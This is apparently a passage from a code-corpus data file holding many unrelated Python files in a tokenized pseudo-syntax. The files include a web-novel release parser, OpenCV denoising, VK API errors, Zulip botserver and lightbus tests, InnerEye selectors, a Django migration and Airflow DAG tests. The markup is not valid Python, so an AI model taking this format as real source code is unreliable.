"+word[1:])<block_end><else_stmt><block_start>f.write(word)<block_end><block_end>f.write("\t")<if_stmt>v[2]<eq>'LOCATION1'<block_start>f.write('location - 1 - ')<block_end><if_stmt>v[2]<eq>'LOCATION2'<block_start>f.write('location - 2 - ')<block_end><if_stmt>len(v[3])<eq>1<block_start>f.write(v[3][0]+"\t")<block_end><else_stmt><block_start>f.write("transit location\t")<block_end>f.write(v[4]+"\n")<block_end><block_end> |
<def_stmt>extractLizonkanovelsWordpressCom item<block_start>'''
Parser for 'lizonkanovels.wordpress.com'
'''<line_sep>vol,chp,frag,postfix=extractVolChapterFragmentPostfix(item['title'])<if_stmt><not>(chp<or>vol)<or>"preview"<in>item['title'].lower()<block_start><return><none><block_end>tagmap=[('bestial blade by priest' 'bestial blade' 'translated') ('creatures of habit by meat in the shell' 'creatures of habit' 'translated') ('seal cultivation for self-improvement by mo xiao xian' 'seal cultivation for self-improvement' 'translated') ('PRC' 'PRC' 'translated') ('Loiterous' 'Loiterous' 'oel') ]<for_stmt>tagname,name,tl_type tagmap<block_start><if_stmt>tagname<in>item['tags']<block_start><return>buildReleaseMessageWithType(item name vol chp frag=frag postfix=postfix tl_type=tl_type)<block_end><block_end><return><false><block_end> |
# -*- coding: utf-8 -*-
# @Time : 2017/7/13 下午9:56
# @Author : play4fun
# @File : 1-fastNlMeansDenoisingColored.py
# @Software: PyCharm
"""
1-fastNlMeansDenoisingColored.py:
"""<import_stmt>numpy<as>np<import_stmt>cv2<import_from_stmt>matplotlib pyplot<as>plt<line_sep>img=cv2.imread('die.png')<line_sep>img=cv2.cvtColor(img code=cv2.COLOR_BGR2RGB)<line_sep>dst=cv2.fastNlMeansDenoisingColored(img <none> 10 10 7 21)<line_sep># dst2=cv2.cvtColor(dst,code=cv2.COLOR_BGR2RGB)
plt.subplot(121) plt.imshow(img)<line_sep>plt.subplot(122) plt.imshow(dst)<line_sep># plt.subplot(122), plt.imshow(dst2)
plt.show()<line_sep> |
# API Error Codes
AUTHORIZATION_FAILED=5# Invalid access token
PERMISSION_IS_DENIED=7<line_sep>CAPTCHA_IS_NEEDED=14<line_sep>ACCESS_DENIED=15# No access to call this method
INVALID_USER_ID=113# User deactivated
<class_stmt>VkException(Exception)<block_start><pass><block_end><class_stmt>VkAuthError(VkException)<block_start><pass><block_end><class_stmt>VkAPIError(VkException)<block_start>__slots__=['error' 'code' 'message' 'request_params' 'redirect_uri']<line_sep>CAPTCHA_NEEDED=14<line_sep>ACCESS_DENIED=15<def_stmt>__init__ self error_data<block_start>super(VkAPIError self).__init__()<line_sep>self.error_data=error_data<line_sep>self.code=error_data.get('error_code')<line_sep>self.message=error_data.get('error_msg')<line_sep>self.request_params=self.get_pretty_request_params(error_data)<line_sep>self.redirect_uri=error_data.get('redirect_uri')<block_end>@staticmethod<def_stmt>get_pretty_request_params error_data<block_start>request_params=error_data.get('request_params' ())<line_sep>request_params={param['key']:param['value']<for>param request_params}<line_sep><return>request_params<block_end><def_stmt>is_access_token_incorrect self<block_start><return>self.code<eq>self.ACCESS_DENIED<and>'access_token'<in>self.message<block_end><def_stmt>is_captcha_needed self<block_start><return>self.code<eq>self.CAPTCHA_NEEDED<block_end>@property<def_stmt>captcha_sid self<block_start><return>self.error_data.get('captcha_sid')<block_end>@property<def_stmt>captcha_img self<block_start><return>self.error_data.get('captcha_img')<block_end><def_stmt>__str__ self<block_start>error_message='{self.code}. {self.message}. request_params = {self.request_params}'.format(self=self)<if_stmt>self.redirect_uri<block_start>error_message<augadd>',\nredirect_uri = "{self.redirect_uri}"'.format(self=self)<block_end><return>error_message<block_end><block_end> |
# -*- coding: UTF-8 -*-
"""
@author: hhyo
@license: Apache Licence
@file: pt_archiver.py
@time: 2020/01/10
"""<import_from_stmt>common.config SysConfig<import_from_stmt>sql.plugins.plugin Plugin<line_sep>__author__='hhyo'<class_stmt>PtArchiver(Plugin)<block_start>"""
pt-archiver归档数据
"""<def_stmt>__init__ self<block_start>self.path='pt-archiver'<line_sep>self.required_args=[]<line_sep>self.disable_args=['analyze']<line_sep>super(Plugin self).__init__()<block_end><def_stmt>generate_args2cmd self args shell<block_start>"""
转换请求参数为命令行
:param args:
:param shell:
:return:
"""<line_sep>k_options=['no-version-check' 'statistics' 'bulk-insert' 'bulk-delete' 'purge' 'no-delete']<line_sep>kv_options=['source' 'dest' 'file' 'where' 'progress' 'charset' 'limit' 'txn-size' 'sleep']<if_stmt>shell<block_start>cmd_args=self.path<if>self.path<else>''<for_stmt>name,value args.items()<block_start><if_stmt>name<in>k_options<and>value<block_start>cmd_args<augadd>f' --{name}'<block_end><elif_stmt>name<in>kv_options<block_start><if_stmt>name<eq>'where'<block_start>cmd_args<augadd>f' --{name} "{value}"'<block_end><else_stmt><block_start>cmd_args<augadd>f' --{name} {value}'<block_end><block_end><block_end><block_end><else_stmt><block_start>cmd_args=[self.path]<for_stmt>name,value args.items()<block_start><if_stmt>name<in>k_options<and>value<block_start>cmd_args.append(f'--{name}')<block_end><elif_stmt>name<in>kv_options<block_start>cmd_args.append(f'--{name}')<line_sep>cmd_args.append(f'{value}')<block_end><block_end><block_end><return>cmd_args<block_end><block_end> |
<import_from_future_stmt> print_function<import_stmt>os<import_stmt>argparse<import_stmt>torch<import_stmt>torch.backends.cudnn<as>cudnn<import_stmt>numpy<as>np<import_from_stmt>data cfg_mnet cfg_slim cfg_rfb<import_from_stmt>layers.functions.prior_box PriorBox<import_from_stmt>utils.nms.py_cpu_nms py_cpu_nms<import_stmt>cv2<import_from_stmt>thop profile<import_from_stmt>thop clever_format<import_from_stmt>models.retinaface RetinaFace<import_from_stmt>models.net_slim Slim<import_from_stmt>models.net_rfb RFB<import_from_stmt>utils.box_utils decode decode_landm<import_from_stmt>utils.timer Timer<line_sep>parser=argparse.ArgumentParser(description='Test')<line_sep>parser.add_argument('--network' default='mobile0.25' help='Backbone network mobile0.25 or slim or RFB')<line_sep>parser.add_argument('--long_side' default=320 help='when origin_size is false, long_side is scaled size(320 or 640 for long side)')<line_sep>args=parser.parse_args()<if_stmt>__name__<eq>'__main__'<block_start>torch.set_grad_enabled(<false>)<line_sep>cfg=<none><line_sep>net=<none><if_stmt>args.network<eq>"mobile0.25"<block_start>cfg=cfg_mnet<line_sep>net=RetinaFace(cfg=cfg phase='test')<block_end><elif_stmt>args.network<eq>"slim"<block_start>cfg=cfg_slim<line_sep>net=Slim(cfg=cfg phase='test')<block_end><elif_stmt>args.network<eq>"RFB"<block_start>cfg=cfg_rfb<line_sep>net=RFB(cfg=cfg phase='test')<block_end><else_stmt><block_start>print("Don't support network!")<line_sep>exit(0)<block_end>long_side=int(args.long_side)<line_sep>short_side=int(args.long_side/4<times>3)<line_sep>img=torch.randn(1 3 long_side short_side)<line_sep>flops,params=profile(net inputs=(img ))<line_sep>flops,params=clever_format([flops params] "%.3f")<line_sep>print("param:" params "flops:" flops)<block_end> |
# encoding: utf-8
# module Grasshopper.Kernel.Geometry.ConvexHull calls itself ConvexHull
# from Grasshopper,Version=1.0.0.20,Culture=neutral,PublicKeyToken=dda4f5ec2cd80803
# by generator 1.145
""" NamespaceTracker represent a CLS namespace. """<line_sep># no imports
# no functions
# classes
<class_stmt>Solver(object)# no doc
<block_start>@staticmethod<def_stmt>Compute nodes hull<block_start>""" Compute(nodes: Node2List,hull: List[int]) -> bool """<line_sep><pass><block_end>@staticmethod<def_stmt>ComputeHull *__args<block_start>"""
ComputeHull(pts: Node2List) -> Polyline
ComputeHull(GH_pts: IEnumerable[GH_Point],plane: Plane) -> (Polyline,Plane)
ComputeHull(GH_pts: IEnumerable[GH_Point]) -> Polyline
"""<line_sep><pass><block_end><block_end> |
<import_stmt>json<import_stmt>os<import_stmt>unittest<import_from_stmt>collections OrderedDict<import_from_stmt>importlib import_module<import_from_stmt>pathlib Path<import_from_stmt>types ModuleType<import_from_stmt>typing Any Dict<import_from_stmt>unittest mock<import_from_stmt>zulip_bots.finder metadata<import_from_stmt>zulip_bots.lib BotHandler<import_from_stmt>zulip_botserver server<import_from_stmt>zulip_botserver.input_parameters parse_args<import_from_stmt>.server_test_lib BotServerTestCase<class_stmt>BotServerTests(BotServerTestCase)<block_start><class_stmt>MockMessageHandler<block_start><def_stmt>handle_message self message:Dict[str str] bot_handler:BotHandler<arrow><none><block_start><assert_stmt>message<eq>{"key":"test message"}<block_end><block_end><class_stmt>MockLibModule<block_start><def_stmt>handler_class self<arrow>Any<block_start><return>BotServerTests.MockMessageHandler()<block_end><block_end><def_stmt>setUp self<arrow><none># Since initializing Client invokes `get_server_settings` that fails in the test
# environment, we need to mock it to pretend that there exists a backend.
<block_start>super().setUp()<line_sep>self.patch=mock.patch("zulip.Client.get_server_settings" return_value=mock.Mock())<line_sep>self.patch.start()<block_end><def_stmt>test_successful_request self<arrow><none><block_start>available_bots=["helloworld"]<line_sep>bots_config={"helloworld":{"email":"<EMAIL>" "key":"123456789qwertyuiop" "site":"http://localhost" "token":"<KEY>" }}<line_sep>self.assert_bot_server_response(available_bots=available_bots bots_config=bots_config event=dict(message={"content":"@**test** test message"} bot_email="<EMAIL>" trigger="mention" token="<KEY>" ) expected_response="beep boop" check_success=<true> )<block_end><def_stmt>test_successful_request_from_two_bots self<arrow><none><block_start>available_bots=["helloworld" "help"]<line_sep>bots_config={"helloworld":{"email":"<EMAIL>" "key":"123456789qwertyuiop" "site":"http://localhost" "token":"<KEY>" } "help":{"email":"<EMAIL>" "key":"123456789qwertyuiop" "site":"http://localhost" "token":"<KEY>" } }<line_sep>self.assert_bot_server_response(available_bots=available_bots event=dict(message={"content":"@**test** test message"} bot_email="<EMAIL>" trigger="mention" token="<KEY>" ) expected_response="beep boop" bots_config=bots_config check_success=<true> )<block_end><def_stmt>test_request_for_unkown_bot self<arrow><none><block_start>bots_config={"helloworld":{"email":"<EMAIL>" "key":"123456789qwertyuiop" "site":"http://localhost" "token":"<KEY>" } }<line_sep>self.assert_bot_server_response(available_bots=["helloworld"] event=dict(message={"content":"test message"} bot_email="<EMAIL>") bots_config=bots_config check_success=<false> )<block_end><def_stmt>test_wrong_bot_token self<arrow><none><block_start>available_bots=["helloworld"]<line_sep>bots_config={"helloworld":{"email":"<EMAIL>" "key":"123456789qwertyuiop" "site":"http://localhost" "token":"<KEY>" }}<line_sep>self.assert_bot_server_response(available_bots=available_bots bots_config=bots_config event=dict(message={"content":"@**test** test message"} bot_email="<EMAIL>" trigger="mention" token="wrongtoken" ) check_success=<false> )<block_end>@mock.patch("logging.error")@mock.patch("zulip_bots.lib.StateHandler")<def_stmt>test_wrong_bot_credentials self mock_StateHandler:mock.Mock mock_LoggingError:mock.Mock<arrow><none><block_start>available_bots=["nonexistent-bot"]<line_sep>bots_config={"nonexistent-bot":{"email":"<EMAIL>" "key":"123456789qwertyuiop" "site":"http://localhost" "token":"<KEY>" }}<with_stmt>self.assertRaisesRegex(SystemExit 'Error: Bot "nonexistent-bot" doesn\'t exist. Please make '<concat>"sure you have set up the botserverrc file correctly." )<block_start>self.assert_bot_server_response(available_bots=available_bots event=dict(message={"content":"@**test** test message"} bot_email="<EMAIL>" trigger="mention" token="<KEY>" ) bots_config=bots_config )<block_end><block_end>@mock.patch("sys.argv" ["zulip-botserver" "--config-file" "/foo/bar/baz.conf"])<def_stmt>test_argument_parsing_defaults self<arrow><none><block_start>opts=parse_args()<assert_stmt>opts.config_file<eq>"/foo/bar/baz.conf"<assert_stmt>opts.bot_name<is><none><assert_stmt>opts.bot_config_file<is><none><assert_stmt>opts.hostname<eq>"127.0.0.1"<assert_stmt>opts.port<eq>5002<block_end><def_stmt>test_read_config_from_env_vars self<arrow><none># We use an OrderedDict so that the order of the entries in
# the stringified environment variable is standard even on
# Python 3.7 and earlier.
<block_start>bots_config=OrderedDict()<line_sep>bots_config["hello_world"]={"email":"<EMAIL>" "key":"value" "site":"http://localhost" "token":"<KEY>" }<line_sep>bots_config["giphy"]={"email":"<EMAIL>" "key":"value2" "site":"http://localhost" "token":"<KEY>" }<line_sep>os.environ["ZULIP_BOTSERVER_CONFIG"]=json.dumps(bots_config)<line_sep># No bot specified; should read all bot configs
<assert_stmt>server.read_config_from_env_vars()<eq>bots_config<line_sep># Specified bot exists; should read only that section.
<assert_stmt>server.read_config_from_env_vars("giphy")<eq>{"giphy":bots_config["giphy"]}<line_sep># Specified bot doesn't exist; should read the first section of the config.
<assert_stmt>server.read_config_from_env_vars("redefined_bot")<eq>{"redefined_bot":bots_config["hello_world"]}<block_end><def_stmt>test_read_config_file self<arrow><none><block_start><with_stmt>self.assertRaises(IOError)<block_start>server.read_config_file("nonexistentfile.conf")<block_end>current_dir=os.path.dirname(os.path.abspath(__file__))<line_sep># No bot specified; should read all bot configs.
bot_conf1=server.read_config_file(os.path.join(current_dir "test.conf"))<line_sep>expected_config1={"helloworld":{"email":"<EMAIL>" "key":"value" "site":"http://localhost" "token":"<KEY>" } "giphy":{"email":"<EMAIL>" "key":"value2" "site":"http://localhost" "token":"<KEY>" } }<assert_stmt>json.dumps(bot_conf1 sort_keys=<true>)<eq>json.dumps(expected_config1 sort_keys=<true>)<line_sep># Specified bot exists; should read only that section.
bot_conf3=server.read_config_file(os.path.join(current_dir "test.conf") "giphy")<line_sep>expected_config3={"giphy":{"email":"<EMAIL>" "key":"value2" "site":"http://localhost" "token":"<KEY>" }}<assert_stmt>json.dumps(bot_conf3 sort_keys=<true>)<eq>json.dumps(expected_config3 sort_keys=<true>)<line_sep># Specified bot doesn't exist; should read the first section of the config.
bot_conf2=server.read_config_file(os.path.join(current_dir "test.conf") "redefined_bot")<line_sep>expected_config2={"redefined_bot":{"email":"<EMAIL>" "key":"value" "site":"http://localhost" "token":"<KEY>" }}<assert_stmt>json.dumps(bot_conf2 sort_keys=<true>)<eq>json.dumps(expected_config2 sort_keys=<true>)<block_end><def_stmt>test_load_lib_modules self<arrow><none># This testcase requires hardcoded paths, which here is a good thing so if we ever
# restructure zulip_bots, this test would fail and we would also update Botserver
# at the same time.
<block_start>helloworld=import_module("zulip_bots.bots.{bot}.{bot}".format(bot="helloworld"))<line_sep>root_dir=Path(__file__).parents[2].as_posix()<line_sep># load valid module name
module=server.load_lib_modules(["helloworld"])["helloworld"]<assert_stmt>module<eq>helloworld<line_sep># load valid file path
path=Path(root_dir "zulip_bots/zulip_bots/bots/{bot}/{bot}.py".format(bot="helloworld")).as_posix()<line_sep>module=server.load_lib_modules([path])[path]<assert_stmt>module.__name__<eq>"custom_bot_module"<assert_stmt>module.__file__<eq>path<assert_stmt>isinstance(module ModuleType)<line_sep># load invalid module name
<with_stmt>self.assertRaisesRegex(SystemExit 'Error: Bot "botserver-test-case-random-bot" doesn\'t exist. '<concat>"Please make sure you have set up the botserverrc file correctly." )<block_start>module=server.load_lib_modules(["botserver-test-case-random-bot"])["botserver-test-case-random-bot"]<block_end># load invalid file path
<with_stmt>self.assertRaisesRegex(SystemExit 'Error: Bot "{}/zulip_bots/zulip_bots/bots/helloworld.py" doesn\'t exist. '<concat>"Please make sure you have set up the botserverrc file correctly.".format(root_dir) )<block_start>path=Path(root_dir "zulip_bots/zulip_bots/bots/{bot}.py".format(bot="helloworld")).as_posix()<line_sep>module=server.load_lib_modules([path])[path]<block_end><block_end>@mock.patch("zulip_botserver.server.app")@mock.patch("sys.argv" ["zulip-botserver" "--config-file" "/foo/bar/baz.conf"])<def_stmt>test_load_from_registry self mock_app:mock.Mock<arrow><none><block_start>packaged_bot_module=mock.MagicMock(__version__="1.0.0" __file__="asd")<line_sep>packaged_bot_entrypoint=metadata.EntryPoint("packaged_bot" "module_name" "zulip_bots.registry")<line_sep>bots_config={"packaged_bot":{"email":"<EMAIL>" "key":"value" "site":"http://localhost" "token":"<KEY>" }}<with_stmt>mock.patch("zulip_botserver.server.read_config_file" return_value=bots_config) mock.patch("zulip_botserver.server.lib.ExternalBotHandler" new=mock.Mock()) mock.patch("zulip_bots.finder.metadata.EntryPoint.load" return_value=packaged_bot_module ) mock.patch("zulip_bots.finder.metadata.entry_points" return_value=(packaged_bot_entrypoint ) )<block_start>server.main()<block_end>mock_app.config.__setitem__.assert_any_call("BOTS_LIB_MODULES" {"packaged_bot":packaged_bot_module})<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end> |
# ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
<import_stmt>logging<import_from_stmt>pathlib Path<import_from_stmt>typing Any Dict List<import_stmt>numpy<as>np<import_stmt>torch<import_from_stmt>sklearn.metrics roc_auc_score<import_from_stmt>InnerEyeDataQuality.configs.config_node ConfigNode<import_from_stmt>InnerEyeDataQuality.deep_learning.model_inference inference_ensemble<import_from_stmt>InnerEyeDataQuality.deep_learning.utils load_selector_config<import_from_stmt>InnerEyeDataQuality.selection.selectors.base SampleSelector<import_from_stmt>InnerEyeDataQuality.selection.selectors.bald BaldSelector<import_from_stmt>InnerEyeDataQuality.selection.selectors.graph GraphBasedSelector GraphParameters<import_from_stmt>InnerEyeDataQuality.selection.selectors.label_based LabelBasedDecisionRule PosteriorBasedSelector<import_from_stmt>InnerEyeDataQuality.selection.simulation_statistics get_ambiguous_sample_ids<import_from_stmt>InnerEyeDataQuality.utils.custom_types SelectorTypes<as>ST<import_from_stmt>InnerEyeDataQuality.utils.plot plot_model_embeddings<def_stmt>evaluate_ambiguous_case_detection bald_score:np.ndarray labels_complete:np.ndarray<arrow><none><block_start>uncertain_cases=np.zeros_like(bald_score)<line_sep>true_ambiguous_cases=get_ambiguous_sample_ids(labels_complete)<line_sep>uncertain_cases[true_ambiguous_cases]=1<line_sep>auc_=roc_auc_score(y_true=uncertain_cases y_score=bald_score)<line_sep>logging.info(f'BALD ambiguous detection AUC: {float(auc_):.2f}')<block_end><def_stmt>pretty_selector_name _type:str model_name:str<arrow>str<block_start>type_dict={'BaldSelector':<none> 'PosteriorBasedSelector':<none> 'PosteriorBasedSelectorJoint':'With entropy' 'GraphBasedSelector':'Graph'}<line_sep>_type=type_dict[_type]# type: ignore
<return>f'{model_name} ({_type})'<if>_type<else>f'{model_name}'<block_end><def_stmt>get_selector _type:str cfg:ConfigNode **pars:Any<arrow>SampleSelector<block_start>name=pars["name"]<line_sep>num_samples=pars["dataset"].num_samples<line_sep>num_classes=pars["dataset"].num_classes<line_sep>sample_indices=pars["dataset"].indices<line_sep>embeddings=pars["embeddings"]<line_sep>avg_posteriors=pars["avg_posteriors"]<line_sep>all_posteriors=pars["all_posteriors"]<line_sep>output_directory=pars["output_directory"]<line_sep>trainer=pars["trainer"]<line_sep>use_active_relabelling=pars["use_active_relabelling"]<if_stmt>ST(_type)<is>ST.GraphBasedSelector<block_start>distance_metric="cosine"<if>(cfg.model.resnet.apply_l2_norm<or>cfg.train.use_self_supervision)<else>"euclidean"<line_sep>graph_params=GraphParameters(n_neighbors=num_samples<floordiv>200 diffusion_alpha=0.90 cg_solver_max_iter=10 diffusion_batch_size=num_samples<floordiv>200 distance_kernel=distance_metric)<line_sep><return>GraphBasedSelector(num_samples num_classes embeddings sample_indices=sample_indices name=name graph_params=graph_params)<block_end><elif_stmt>ST(_type)<is>ST.BaldSelector<block_start><return>BaldSelector(posteriors=all_posteriors num_samples=num_samples num_classes=num_classes name=name trainer=trainer use_active_relabelling=use_active_relabelling)<block_end><elif_stmt>ST(_type)<is>ST.PosteriorBasedSelector<block_start><return>PosteriorBasedSelector(avg_posteriors num_samples num_classes=num_classes name=name decision_rule=LabelBasedDecisionRule.CROSS_ENTROPY output_directory=output_directory trainer=trainer use_active_relabelling=use_active_relabelling)<block_end><elif_stmt>ST(_type)<is>ST.PosteriorBasedSelectorJoint<block_start><return>PosteriorBasedSelector(avg_posteriors num_samples num_classes=num_classes name=name decision_rule=LabelBasedDecisionRule.JOINT output_directory=output_directory trainer=trainer use_active_relabelling=use_active_relabelling)<block_end><else_stmt><block_start><raise>ValueError("Unknown selector type is specified")<block_end><block_end><def_stmt>get_user_specified_selectors list_configs:List[str] dataset:Any output_path:Path plot_embeddings:bool=<false><arrow>Dict[str SampleSelector]<block_start>"""
Load the user specific configs, get the embeddings and return the selectors.
:param list_configs:
:return: dictionary of selector
"""<line_sep>logging.info("Loading the selector configs:\n {0}".format('\n'.join(list_configs)))<line_sep>user_specified_selectors=dict()<for_stmt>cfg [load_selector_config(cfg)<for>cfg list_configs]# Collect model probability predictions for the given set of images in the training set.
<block_start>embeddings,avg_posteriors,all_posteriors,trainer=inference_ensemble(dataset cfg)<assert_stmt>avg_posteriors.shape[0]<eq>dataset.num_samples<if_stmt>plot_embeddings<block_start>sample_label_counts=dataset.label_counts<line_sep>plot_model_embeddings(embeddings=embeddings label_distribution=sample_label_counts label_names=dataset.get_label_names() save_path=output_path)<block_end><for_stmt>_type cfg.selector.type<block_start>selector_params={"dataset":dataset "trainer":trainer<if>cfg.selector.use_active_relabelling<else><none> "embeddings":embeddings "avg_posteriors":avg_posteriors "all_posteriors":all_posteriors "output_directory":cfg.selector.output_directory "use_active_relabelling":cfg.selector.use_active_relabelling "name":pretty_selector_name(_type cfg.selector.model_name)}<line_sep>selector_name=pretty_selector_name(_type cfg.selector.model_name)<line_sep>user_specified_selectors[selector_name]=get_selector(_type cfg **selector_params)<block_end><block_end><return>user_specified_selectors<block_end><def_stmt>update_trainer_for_simulation selector:Any seed:int<arrow><none><block_start><if_stmt>selector.trainer<is><none><block_start><return><block_end># check if device_id is within the range
num_gpus=torch.cuda.device_count()<line_sep>device_id=seed%num_gpus<line_sep># set the device attribute in config object
selector.trainer.config.defrost()<line_sep>selector.trainer.config.device=device_id<line_sep>selector.trainer.config.train.seed=seed<line_sep>selector.trainer.config.train.dataloader.num_workers=0<line_sep>selector.trainer.config.validation.dataloader.num_workers=0<line_sep>selector.trainer.config.freeze()<line_sep>selector.trainer.device=torch.device(device_id)<line_sep># migrate all parameters to the given device
selector.trainer.models=[model.to(device_id)<for>model selector.trainer.models]<block_end> |
<import_stmt>demistomock<as>demisto# noqa: F401
<import_from_stmt>CommonServerPython *# noqa: F401
COLORS={'1 - New':'#00CD33' # (success green)
'2 - In Progress':'#7995D4' # (royal blue)
'3 - On Hold':'#FF9000' # (warning orange)
'4 - Awaiting Caller':'#FF9000' # (warning orange)
'5 - Awaiting Evidence':'#FF9000' # (warning orange)
'6 - Resolved':'#89A5C1' # (polo)
'7 - Closed':'#9AA0A3' # (natural grey)
'8 - Canceled':'#FF1744'# (alert-red)
}<line_sep>TEXT={'1 - New':'New' '2 - In Progress':'In Progress' '3 - On Hold':'On-Hold' '4 - Awaiting Caller':'Awaiting Caller' '5 - Awaiting Evidence':'Awaiting Evidence' '6 - Resolved':'Resolved' '7 - Closed':'Closed' '8 - Canceled':'Canceled'}<line_sep>incident=demisto.incidents()<line_sep>service_now_state=(incident[0].get('CustomFields' {}).get('servicenowstate'))<try_stmt><block_start>text_color=COLORS[service_now_state]<line_sep>text_content=TEXT[service_now_state]<block_end><except_stmt>Exception<as>e<block_start>demisto.debug(f'SnowIncidentStatus debug - state is: {service_now_state}\n{e}')<line_sep>text_color='#000000'<line_sep>text_content='Pending Update'<block_end>html=f"<div style='color:{text_color};text-align:center;'><h2>{text_content}</h2></div>"<line_sep>demisto.results({'ContentsFormat':formats['html'] 'Type':entryTypes['note'] 'Contents':html})<line_sep> |
<import_stmt>pytest<import_from_stmt>lightbus Api Event<import_from_stmt>lightbus.api ApiRegistry<import_from_stmt>lightbus.exceptions MisconfiguredApiOptions InvalidApiEventConfiguration InvalidApiRegistryEntry UnknownApi <line_sep>pytestmark=pytest.mark.unit<line_sep>@pytest.fixture()<def_stmt>SimpleApi <block_start><class_stmt>SimpleApi(Api)<block_start><class_stmt>Meta<block_start>name="simple.api"<block_end><block_end><return>SimpleApi<block_end>@pytest.fixture()<def_stmt>registry <block_start><return>ApiRegistry()<block_end><def_stmt>test_api_named_default # Apis can not start with the name 'default'
<block_start><with_stmt>pytest.raises(MisconfiguredApiOptions)<block_start><class_stmt>BadApi(Api)<block_start><class_stmt>Meta<block_start>name="default"<block_end><block_end><block_end><block_end><def_stmt>test_api_named_default_dot_something # Apis can not start with the name 'default'
<block_start><with_stmt>pytest.raises(MisconfiguredApiOptions)<block_start><class_stmt>BadApi(Api)<block_start><class_stmt>Meta<block_start>name="default.foo"<block_end><block_end><block_end><block_end><def_stmt>test_pass_string_as_event_params # Check we cannot accidentally pass a string to Event in the
# case that we omit a ',' when specifying a parameters tuple
<block_start><with_stmt>pytest.raises(InvalidApiEventConfiguration)<block_start>Event(parameters=("foo"))<block_end><block_end><def_stmt>test_api_registry_add_ok SimpleApi registry<block_start>registry.add(SimpleApi())<assert_stmt>"simple.api"<in>registry._apis<block_end><def_stmt>test_api_registry_add_class SimpleApi registry<block_start><with_stmt>pytest.raises(InvalidApiRegistryEntry)<block_start>registry.add(SimpleApi)<block_end><block_end><def_stmt>test_api_registry_get_ok SimpleApi registry<block_start>api=SimpleApi()<line_sep>registry.add(api)<assert_stmt>registry.get("simple.api")<eq>api<block_end><def_stmt>test_api_registry_get_unknown SimpleApi registry<block_start><with_stmt>pytest.raises(UnknownApi)<block_start>registry.get("unknown.api")<block_end><block_end><def_stmt>test_api_registry_remove_ok SimpleApi registry<block_start>registry.add(SimpleApi())<line_sep>registry.remove("simple.api")<assert_stmt><not>registry._apis<block_end><def_stmt>test_api_registry_remove_unknown SimpleApi registry<block_start><with_stmt>pytest.raises(UnknownApi)<block_start>registry.remove("unknown.api")<block_end><block_end><def_stmt>test_api_registry_internal registry<block_start><class_stmt>InternalApi(Api)<block_start><class_stmt>Meta<block_start>name="internal.api"<line_sep>internal=<true><block_end><block_end>api=InternalApi()<line_sep>registry.add(api)<assert_stmt>registry.internal()<eq>[api]<assert_stmt>registry.public()<eq>[]<block_end><def_stmt>test_api_registry_public SimpleApi registry<block_start>api=SimpleApi()<line_sep>registry.add(api)<assert_stmt>registry.public()<eq>[api]<assert_stmt>registry.internal()<eq>[]<block_end><def_stmt>test_api_registry_all SimpleApi registry<block_start>api=SimpleApi()<line_sep>registry.add(api)<assert_stmt>registry.all()<eq>[api]<block_end><def_stmt>test_api_registry_names SimpleApi registry<block_start>api=SimpleApi()<line_sep>registry.add(api)<assert_stmt>registry.names()<eq>["simple.api"]<block_end> |
# Generated by Django 2.2.12 on 2020-04-26 17:53
<import_from_stmt>django.db migrations models<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[("zerver" "0273_migrate_old_bot_messages") ]<line_sep>operations=[migrations.AlterField(model_name="stream" name="invite_only" field=models.BooleanField(default=<false> null=<true>) ) migrations.AlterField(model_name="subscription" name="audible_notifications" field=models.BooleanField(default=<none> null=<true>) ) migrations.AlterField(model_name="subscription" name="desktop_notifications" field=models.BooleanField(default=<none> null=<true>) ) migrations.AlterField(model_name="subscription" name="email_notifications" field=models.BooleanField(default=<none> null=<true>) ) migrations.AlterField(model_name="subscription" name="is_muted" field=models.BooleanField(default=<false> null=<true>) ) migrations.AlterField(model_name="subscription" name="push_notifications" field=models.BooleanField(default=<none> null=<true>) ) migrations.AlterField(model_name="subscription" name="wildcard_mentions_notify" field=models.BooleanField(default=<none> null=<true>) ) migrations.AlterField(model_name="userprofile" name="enter_sends" field=models.BooleanField(default=<false> null=<true>) ) ]<block_end> |
"""
Example that sends a single message and exits using the simple interface.
You can use `simple_receive.py` (or `complete_receive.py`) to receive the
message sent.
"""<import_stmt>eventlet<import_from_stmt>kombu Connection<line_sep>eventlet.monkey_patch()<def_stmt>send_many n#: Create connection
#: If hostname, userid, password and virtual_host is not specified
#: the values below are the default, but listed here so it can
#: be easily changed.
<block_start><with_stmt>Connection('amqp://guest:guest@localhost:5672//')<as>connection#: SimpleQueue mimics the interface of the Python Queue module.
#: First argument can either be a queue name or a kombu.Queue object.
#: If a name, then the queue will be declared with the name as the
#: queue name, exchange name and routing key.
<block_start><with_stmt>connection.SimpleQueue('kombu_demo')<as>queue<block_start><def_stmt>send_message i<block_start>queue.put({'hello':f'world{i}'})<block_end>pool=eventlet.GreenPool(10)<for_stmt>i range(n)<block_start>pool.spawn(send_message i)<block_end>pool.waitall()<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>send_many(10)<block_end> |
<import_stmt>unittest<import_stmt>sys<line_sep>sys.path.insert(1 '../resources')<import_stmt>importlib.util<def_stmt>load_file_as_module filepath<block_start>spec=importlib.util.spec_from_file_location("dag" filepath)<line_sep>compiled_dag_lib=importlib.util.module_from_spec(spec)<line_sep>spec.loader.exec_module(compiled_dag_lib)<line_sep><return>compiled_dag_lib<block_end><class_stmt>TestCompiledAirflowTemplate(unittest.TestCase)<block_start><def_stmt>test_should_run_compiled_airflow_template self<block_start>compiled_dag_lib=load_file_as_module('../resources/expected_compiled_template.py')<line_sep>dag=compiled_dag_lib.dag<line_sep>self.assertEqual('foo' dag.dag_id)<line_sep>self.assertEqual(5 len(dag.tasks))<line_sep>self.assertEqual("bq" dag.tasks[0].task_id)<line_sep>self.assertEqual("hook_transporter" dag.tasks[1].task_id)<line_sep>self.assertEqual("hook_predator" dag.tasks[2].task_id)<line_sep>self.assertEqual("wait_foo-intra-dep-job-bq" dag.tasks[3].task_id)<line_sep>self.assertEqual("wait_foo-inter-dep-job-bq" dag.tasks[4].task_id)<line_sep>self.assertEqual("SuperKubernetesPodOperator" dag.tasks[0].__class__.__name__)<line_sep>self.assertEqual("SuperKubernetesPodOperator" dag.tasks[1].__class__.__name__)<line_sep>self.assertEqual("SuperKubernetesPodOperator" dag.tasks[2].__class__.__name__)<line_sep>self.assertEqual("SuperExternalTaskSensor" 